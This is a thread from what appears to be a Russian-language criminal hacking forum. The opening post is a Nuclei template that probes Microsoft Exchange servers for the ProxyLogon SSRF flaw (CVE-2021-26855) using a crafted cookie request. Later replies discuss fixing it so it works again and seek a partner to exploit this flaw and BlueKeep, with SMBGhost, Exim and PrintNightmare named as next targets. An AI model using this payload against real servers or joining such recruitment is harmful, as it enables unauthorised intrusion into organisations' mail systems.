• XSS.stack #1 – первый литературный журнал от юзеров форума

close

Пожалуйста, обратите внимание, что пользователь заблокирован
id: CVE-2021-26855
info:
name: Exchange Server SSRF Vulnerability
author: madrobot
severity: critical
description: |
Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-26412, CVE-2021-26854, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065, CVE-2021-27078.
tags: cve,cve2021,ssrf,rce,exchange
reference: |
- https://proxylogon.com/#timeline
- https://raw.githubusercontent.com/microsoft/CSS-Exchange/main/Security/http-vuln-cve2021-26855.nse
- https://www.shodan.io/search?query=vuln:CVE-2021-26855
- https://gist.github.com/testanull/324546bffab2fe4916d0f9d1f03ffa09
requests:
- raw:
- |
GET /owa/auth/x.js HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Cookie: X-AnonResource=true; X-AnonResource-Backend=somethingnonexistent/ecp/default.flt?~3; X-BEResource=somethingnonexistent/owa/auth/logon.aspx?~3;
Accept-Language: en
Connection: close
matchers-condition: and
matchers:
- type: status
status:
- 500
- 503
- type: word
words:
- 'X-Calculatedbetarget: somethingnonexistent'
part: header

Это уязвимость?
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Уже не актуально думаю: http://xssforum7mmh3n56inuf2h73hvhnzobi7h2ytb3gvklrfqm7ut3xdnyd.onion/threads/50652/
Тоже думаю но если есть желание можно пофиксить и будет работать.
 
нужен, единомышленник по реализации, таких уязвимостей как cve-2021-26855 & 2019-0708, а там уже можно и переключится совместно на SMBGHOST
Актуально? Я бы по другим CVE потестировал, например Exim или Nightmare
 
Последнее редактирование:


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх